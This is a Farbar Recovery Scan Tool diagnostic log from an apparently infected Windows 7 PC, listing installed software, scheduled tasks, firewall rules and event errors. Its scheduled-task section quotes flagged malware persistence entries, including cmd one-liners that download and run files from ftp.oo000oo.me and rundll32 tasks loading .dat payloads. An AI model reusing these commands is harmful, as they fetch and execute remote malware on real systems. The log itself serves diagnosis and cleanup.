Additional scan result of Farbar Recovery Scan Tool (x64) Version: 24-09-2017 Ran by Администратор (25-09-2017 21:43:54) Running from C:\Users\Администратор\Desktop Windows 7 Professional Service Pack 1 (X64) (2017-07-09 10:08:44) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Администратор (S-1-5-21-2248936580-358153698-228202076-500 - Administrator - Enabled) => C:\Users\Администратор Гость (S-1-5-21-2248936580-358153698-228202076-501 - Limited - Disabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) AIDA64 Extreme v5.92 (HKLM-x32\...\AIDA64 Extreme_is1) (Version: 5.92 - FinalWire Ltd.) AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.) ARK: Survival Evolved (HKLM\...\Steam App 346110) (Version: - Studio Wildcard) BitTorrent (HKU\S-1-5-21-2248936580-358153698-228202076-500\...\BitTorrent) (Version: 7.10.0.43917 - BitTorrent Inc.) BlueStacks 3 (HKLM-x32\...\BlueStacks) (Version: 3.7.41.1619 - BlueStack Systems, Inc.) Catalyst Control Center Next Localization BR (HKLM\...\{85EC2DC7-901A-C7A8-69CC-D14B5311C057}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (HKLM\...\{155ABE97-ABF9-EE58-3270-334EF950F3A9}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (HKLM\...\{44167DA6-B26A-A06B-213E-A481135FCBF0}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (HKLM\...\{ED204021-2012-F4F3-E495-F4AFD74D66FF}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (HKLM\...\{1D12B9AD-21F1-791A-6A85-47F27406282C}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (HKLM\...\{0101153A-CA07-4E2C-EF5E-D411604CF036}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (HKLM\...\{3BBAB5EA-62DA-2431-3A1F-3F89BBAE739D}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (HKLM\...\{975476BF-784B-0C34-09B3-AE6DC25C2B3C}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (HKLM\...\{2F028509-06B7-9869-5FD6-1F367A0B5827}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (HKLM\...\{8A5107B8-9CC4-141F-141D-B1952B84A62A}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (HKLM\...\{BFDF75E6-EBBE-FD30-7DED-A80A072A0452}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (HKLM\...\{665B0E99-0560-6850-876C-259CC785D49A}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (HKLM\...\{8191CEE4-C7AB-5A02-4587-9D12B6B443F2}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (HKLM\...\{E3D88B8D-BB11-D376-C3C6-EF7D0F8DD725}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (HKLM\...\{8831C53E-B6FA-3DE6-FB39-66BD5019F083}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (HKLM\...\{CB203E05-4AAA-9076-7D8B-5D7CAD7F0D39}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (HKLM\...\{4166E94C-7758-3D0E-1518-05BF181FBA21}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (HKLM\...\{E2D25167-8913-E00E-6755-270D9010DF62}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (HKLM\...\{4BE67694-29C6-6A69-85E4-D06EFCA12846}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (HKLM\...\{7B1A228A-7D97-3209-B386-AA878D3555C5}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (HKLM\...\{54603A0D-55EB-44D8-0D79-4B7CB94AD6B7}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden Crossout Launcher 1.0.3.18 (HKU\S-1-5-21-2248936580-358153698-228202076-500\...\CrossOutLauncher_is1) (Version: - ) Dead by Daylight (HKLM\...\Steam App 381210) (Version: - Behaviour Digital Inc.) Discord (HKU\S-1-5-21-2248936580-358153698-228202076-500\...\Discord) (Version: 0.0.298 - Discord Inc.) Dishonored 2 (HKLM-x32\...\Dishonored 2_R.G. Mechanics_is1) (Version: - R.G. Mechanics, Panky) Divinity - Original Sin 2 v.3.0.143.148 (HKLM-x32\...\Divinity - Original Sin 2_is1) (Version: - ) Etron USB3.0 Host Controller (HKLM-x32\...\{DFBB738C-71D8-4DC5-B8D2-D65C37680E27}) (Version: 0.105 - Etron Technology) Hidden f.lux (HKU\S-1-5-21-2248936580-358153698-228202076-500\...\Flux) (Version: - ) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.113 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version: - Blizzard Entertainment) HiSuite (HKLM-x32\...\Hi Suite) (Version: 1.0 - Huawei Technologies Co.,Ltd) Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1118 - Intel Corporation) Lightshot-5.4.0.10 (HKLM-x32\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.4.0.10 - Skillbrains) Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft) Mortal Kombat X (HKLM\...\Steam App 307780) (Version: - NetherRealm Studios) MSI Afterburner 4.3.0 (HKLM-x32\...\Afterburner) (Version: 4.3.0 - MSI Co., LTD) ON_OFF Charge B11.1102.1 (HKLM-x32\...\{3DECD372-76A1-4483-BF10-B547790A3261}) (Version: 1.00.0001 - GIGABYTE) Path of Exile (HKLM\...\Steam App 238960) (Version: - Grinding Gear Games) PLAYERUNKNOWN'S BATTLEGROUNDS (HKLM\...\Steam App 578080) (Version: - Bluehole, Inc.) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.48.823.2011 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6511 - Realtek Semiconductor Corp.) Skype™ 7.38 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.38.101 - Skype Technologies S.A.) Splashtop Connect for Firefox (HKLM-x32\...\{45D49CA7-D7D8-4659-B35A-EBD98C30AF28}) (Version: 1.1.8.4 - Splashtop Inc.) Splashtop Connect IE (HKLM-x32\...\{3B983EFD-6E37-4AD9-9A7D-8C83E61674F7}) (Version: 1.1.13.1 - Splashtop Inc.) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.1.4 - TeamSpeak Systems GmbH) Tekken 7 v.1.03-u2 (HKLM-x32\...\Tekken 7_is1) (Version: - ) Uplay (HKLM-x32\...\Uplay) (Version: 15.0 - Ubisoft) Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1) (Version: 1.0.39.1 - LunarG, Inc.) Hidden Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1-2) (Version: 1.0.39.1 - LunarG, Inc.) Hidden Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1-3) (Version: 1.0.39.1 - LunarG, Inc.) Hidden Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1-4) (Version: 1.0.39.1 - LunarG, Inc.) Hidden Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1-5) (Version: 1.0.39.1 - LunarG, Inc.) Hidden Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1-6) (Version: 1.0.39.1 - LunarG, Inc.) Vulkan Run Time Libraries 1.0.51.0 (HKLM\...\VulkanRT1.0.51.0) (Version: 1.0.51.0 - LunarG, Inc.) Приложение Blizzard (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-07-20] (Advanced Micro Devices, Inc.) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {19FE9172-FC20-44CF-81D9-889F3B26DD14} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-07-09] (Google Inc.) Task: {2E6DB572-3849-44DA-A04E-812B90F71892} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-07-20] (Advanced Micro Devices, Inc.) Task: {358986D7-9BE6-4252-B909-6404E04B9D19} - System32\Tasks\Mysa3 => cmd /c echo open ftp.oo000oo.me>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION Task: {6649A92E-6363-40C7-AF95-32654D3C033C} - C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate Task: {6649A92E-6363-40C7-AF95-32654D3C033C} - C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(2): %windir%\system32\rundll32.exe -> invagent.dll,RunUpdate Task: {79FD536D-5011-4AD0-A49E-EA9FE5DE1BEE} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION Task: {7F7FA5D7-CFE7-4D05-A51E-C724392B4719} - System32\Tasks\update-S-1-5-21-2248936580-358153698-228202076-500 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2017-04-12] (TODO: ) Task: {C40E28C8-EA04-48B0-886E-400798644861} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-07-09] (Google Inc.) Task: {CA47B020-5759-4374-886C-F090BB8FB1D2} - C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate -nolegacy Task: {CA47B020-5759-4374-886C-F090BB8FB1D2} - C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(2): %windir%\system32\rundll32.exe -> appraiser.dll,DoScheduledTelemetryRun Task: {E86CF195-AB93-42DF-A266-D065BC7E94D4} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa Task: {F616723A-F5CB-4EC4-BFA2-7A2FE06C93C1} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2017-04-12] (TODO: ) Task: {F837B228-089C-49C0-A076-8AB92DCAA347} - System32\Tasks\Mysa2 => cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\update-S-1-5-21-2248936580-358153698-228202076-500.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe Task: C:\Windows\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe ==================== Shortcuts & WMI ======================== (The entries could be listed to be restored or removed.) WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION Shortcut: C:\Users\Администратор\Desktop\Смена языка Divinity - Original Sin 2.lnk -> G:\Games\Divinity - Original Sin 2\language_setup.exe () <==== Cyrillic Shortcut: C:\Users\Администратор\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Crossout\ Каталог с файлами конфигураций, скриншотов и логов.lnk -> C:\Users\Администратор\Documents\My Games\Crossout () <==== Cyrillic Shortcut: C:\Users\Администратор\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Crossout\ Сайт игры Crossout.lnk -> G:\Games\Crossout\game_website_ru.url (No File) <==== Cyrillic Shortcut: C:\Users\Администратор\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Crossout\ Удалить игру.lnk -> G:\Games\Crossout\unins000.exe () <==== Cyrillic Shortcut: C:\Users\Администратор\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Crossout\ Форум игры Crossout.lnk -> G:\Games\Crossout\game_forum_ru.url (No File) <==== Cyrillic Shortcut: C:\Users\Администратор\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Crossout\Каталог с файлами конфигураций, скриншотов и логов.lnk -> C:\Users\Администратор\Documents\My Games\Crossout () <==== Cyrillic Shortcut: C:\Users\Администратор\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Crossout\Сайт игры Crossout.lnk -> G:\Games\Crossout\doc\game_website_ru.url () <==== Cyrillic Shortcut: C:\Users\Администратор\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Crossout\Удалить игру.lnk -> G:\Games\Crossout\unins000.exe () <==== Cyrillic Shortcut: C:\Users\Public\Desktop\Приложение Blizzard.lnk -> G:\Games\Blizzard App\Battle.net Launcher.exe (Blizzard Entertainment) <==== Cyrillic ==================== Loaded Modules (Whitelisted) ============== 2017-04-11 09:17 - 2017-04-11 09:17 - 000192200 _____ () C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe 2017-08-08 21:53 - 2017-09-22 09:44 - 003023872 _____ () c:\windows\debug\lsmose.exe ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-14 09:34 - 2009-06-11 04:00 - 000000824 _____ C:\Windows\system32\Drivers\etc\hosts ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-2248936580-358153698-228202076-500\Control Panel\Desktop\\Wallpaper -> C:\Users\Администратор\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 212.75.210.62 - 212.75.211.2 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall is disabled. ==================== MSCONFIG/TASK MANAGER disabled items == ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [{BE834C13-B130-4D47-9224-83EC18735450}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{228EFDC2-2FB6-4D7C-9681-7B38CCEFE66D}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{1B879206-13BF-472F-B276-0A85FC0122E6}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{AB68ECE0-DC12-49C2-A2D3-26C6D8413DD9}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{E6D047E2-D8E9-4E72-87C2-00548473F3F9}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe FirewallRules: [{2822ED6F-90CA-48FA-8FEE-60C652090987}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe FirewallRules: [{095749FC-D5F3-44B1-9025-E77DC74236EF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe FirewallRules: [{73EBC770-2DB3-41E8-A3AC-259A301E3DE2}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe FirewallRules: [TCP Query User{D23A6EB8-8BF5-4810-B672-B1062F0F4F73}G:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe FirewallRules: [UDP Query User{F65F2D12-4B02-43A0-B316-7848A3D1842F}G:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe FirewallRules: [{FF6460E0-93CE-4E92-999C-70BA49FBC10A}] => (Allow) C:\Users\Администратор\AppData\Roaming\BitTorrent\BitTorrent.exe FirewallRules: [{39979362-5DF3-494B-9D3D-BF2B4D18F9B1}] => (Allow) C:\Users\Администратор\AppData\Roaming\BitTorrent\BitTorrent.exe FirewallRules: [{60EB526C-0D2B-4341-A386-962C3D778CE1}] => (Allow) C:\Users\Администратор\AppData\Roaming\BitTorrent\BitTorrent.exe FirewallRules: [{AC35DD2A-624E-4151-8EC8-474104AE8218}] => (Allow) C:\Users\Администратор\AppData\Roaming\BitTorrent\BitTorrent.exe FirewallRules: [{B011A717-BC6E-414A-85B5-269B2BC22B1C}] => (Allow) C:\Users\Администратор\AppData\Roaming\BitTorrent\BitTorrent.exe FirewallRules: [{B520E566-1C0E-4068-A58E-68A7203DAD42}] => (Allow) C:\Users\Администратор\AppData\Roaming\BitTorrent\BitTorrent.exe FirewallRules: [{923C4AA2-4B4C-474A-BB15-8E0CD0FF3940}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\MK10\Binaries\Retail\MK10.exe FirewallRules: [{BEDBDFEA-BCFF-484D-A89A-BE154370F5BD}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\MK10\Binaries\Retail\MK10.exe FirewallRules: [{B7C428AD-0703-44AA-9789-49CAC5BF4CBE}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\MK10\Binaries\Retail\MKXLauncher.exe FirewallRules: [{9D0834D3-7D55-4503-BE74-84B8ED9FA101}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\MK10\Binaries\Retail\MKXLauncher.exe FirewallRules: [{BAE99289-4D7D-4091-9DB8-3E78C836EEC1}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [TCP Query User{D2DAF864-8E30-4632-A905-B0EAAD9CDE4A}G:\games\crossout\launcher.exe] => (Allow) G:\games\crossout\launcher.exe FirewallRules: [UDP Query User{9A1C45DE-770F-4CBC-860F-0BD451079091}G:\games\crossout\launcher.exe] => (Allow) G:\games\crossout\launcher.exe FirewallRules: [{96C2825E-1496-4B32-B111-10384014E87E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Path of Exile\PathOfExileSteam.exe FirewallRules: [{0421B2F1-0D84-4CF3-981C-D66F3E21C8E5}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Path of Exile\PathOfExileSteam.exe FirewallRules: [{3C37CB6C-06B5-4D2B-A734-D0554E7A64B0}] => (Block) LPort=445 FirewallRules: [{E32E0EF2-C4DF-4945-B51E-F3D70251B18B}] => (Block) LPort=139 FirewallRules: [{A8360E04-4BEE-4997-9940-49B3924AAD12}] => (Block) LPort=135 FirewallRules: [{17D3EF10-DEB8-4C00-812C-54A9EF7EF54D}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{5FFBA97D-FDE2-44C2-A475-4714B0401E17}] => (Allow) C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe FirewallRules: [{D9AEC8CC-39BE-4A8C-B686-F732B3B82E00}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dead by Daylight\DeadByDaylight.exe FirewallRules: [{DC7A70D4-1175-4AE2-909E-1606E9998EE4}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dead by Daylight\DeadByDaylight.exe FirewallRules: [{80D01764-687B-49C1-A09F-25ABEA01DB8B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe FirewallRules: [{8FF59649-E35B-4C1F-B9E0-D5414483F7DA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe ==================== Restore Points ========================= 31-08-2017 16:15:19 Запланированная контрольная точка 06-09-2017 22:15:41 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 06-09-2017 22:16:11 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 15-09-2017 21:08:03 Запланированная контрольная точка 24-09-2017 10:57:25 Запланированная контрольная точка ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (09/25/2017 09:38:43 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (09/25/2017 09:38:24 PM) (Source: Winlogon) (EventID: 4103) (User: ) Description: Ошибка активации лицензии Windows. Ошибка 0x80070005. Error: (09/25/2017 08:20:53 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (09/25/2017 08:20:34 PM) (Source: Winlogon) (EventID: 4103) (User: ) Description: Ошибка активации лицензии Windows. Ошибка 0x80070005. Error: (09/25/2017 05:16:22 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (09/25/2017 05:16:01 PM) (Source: Winlogon) (EventID: 4103) (User: ) Description: Ошибка активации лицензии Windows. Ошибка 0x80070005. Error: (09/25/2017 04:35:21 PM) (Source: Software Protection Platform Service) (EventID: 8193) (User: ) Description: Сбой планировщика активации лицензий (sppuinotify.dll). Код ошибки: 0x80070005 Error: (09/25/2017 03:35:21 PM) (Source: Software Protection Platform Service) (EventID: 8193) (User: ) Description: Сбой планировщика активации лицензий (sppuinotify.dll). Код ошибки: 0x80070005 Error: (09/25/2017 02:35:21 PM) (Source: Software Protection Platform Service) (EventID: 8193) (User: ) Description: Сбой планировщика активации лицензий (sppuinotify.dll). Код ошибки: 0x80070005 Error: (09/25/2017 01:35:21 PM) (Source: Software Protection Platform Service) (EventID: 8193) (User: ) Description: Сбой планировщика активации лицензий (sppuinotify.dll). Код ошибки: 0x80070005 System errors: ============= Error: (09/25/2017 09:38:32 PM) (Source: Service Control Manager) (EventID: 7030) (User: ) Description: Служба "HuaweiHiSuiteService64.exe" помечена как интерактивная. Однако в конфигурации системы интерактивные службы не допускаются. Возможна неправильная работа службы. Error: (09/25/2017 09:37:06 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Служба "SCP DS3 Service" неожиданно прервана. Это произошло (раз): 1. Error: (09/25/2017 09:37:06 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Служба "HuaweiHiSuiteService64.exe" неожиданно прервана. Это произошло (раз): 1. Error: (09/25/2017 09:37:06 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Служба "Intel(R) Management and Security Application User Notification Service" неожиданно прервана. Это произошло (раз): 1. Error: (09/25/2017 09:37:06 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Служба "Splashtop Connect Firefox Software Updater Service" неожиданно прервана. Это произошло (раз): 1. Error: (09/25/2017 09:37:06 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Служба "Splashtop Connect IE Software Updater Service" неожиданно прервана. Это произошло (раз): 1. Error: (09/25/2017 09:37:06 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Служба "AMD External Events Utility" неожиданно прервана. Это произошло (раз): 1. Error: (09/25/2017 08:20:42 PM) (Source: Service Control Manager) (EventID: 7030) (User: ) Description: Служба "HuaweiHiSuiteService64.exe" помечена как интерактивная. Однако в конфигурации системы интерактивные службы не допускаются. Возможна неправильная работа службы. Error: (09/25/2017 08:19:49 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Служба "Intel(R) Management and Security Application User Notification Service" неожиданно прервана. Это произошло (раз): 1. Error: (09/25/2017 08:19:49 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Служба "HuaweiHiSuiteService64.exe" неожиданно прервана. Это произошло (раз): 1. CodeIntegrity: =================================== Date: 2017-09-13 13:28:39.139 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\FinalWire\AIDA64 Extreme\kerneld.x64 because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-09-13 13:28:39.097 Description: 